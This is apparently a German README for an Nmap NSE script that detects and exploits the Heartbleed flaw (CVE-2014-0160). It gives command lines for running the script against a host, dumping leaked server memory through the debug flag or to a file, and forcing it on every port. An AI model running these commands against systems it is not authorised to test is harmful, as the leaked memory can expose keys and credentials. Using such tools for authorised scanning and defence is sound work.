
Nmap NSE-Skript, das Heartbleed/CVE-2014-0160 entdeckt/ausnutzt
Nmap-NSE-Skript, das Heartbleed/CVE-2014-0160 erkennt/ausnutzt. Dieses Skript ist im Wesentlichen das von Patrik Karlsson geschriebene, mit einigen kleineren Änderungen aus meinem eigenen Skript.
Dies wird auf jedem SSL-, FTP-, SMTP- und/oder XMPP-Port ausgeführt.
$ nmap --script ./openssl-heartbleed.nse host.tld
Das Ausgeben von durchgesickertem Speicher wird durch Erhöhen des Nmap-Debug-Levels über das Flag -d aktiviert.
$ nmap -d --script=./openssl-heartbleed.nse host.tld
$ nmap --script ./ssl-heartbleed.nse --script-args 'ssl-heartbleed.dumpfile=/tmp/heartbleed.dump' host.tld
Erzwingt, dass das Skript auf jedem Port ausgeführt wird, unabhängig davon, ob der Dienst erkannt wurde oder nicht.
$ nmap --script +./ssl-heartbleed.nse host.tld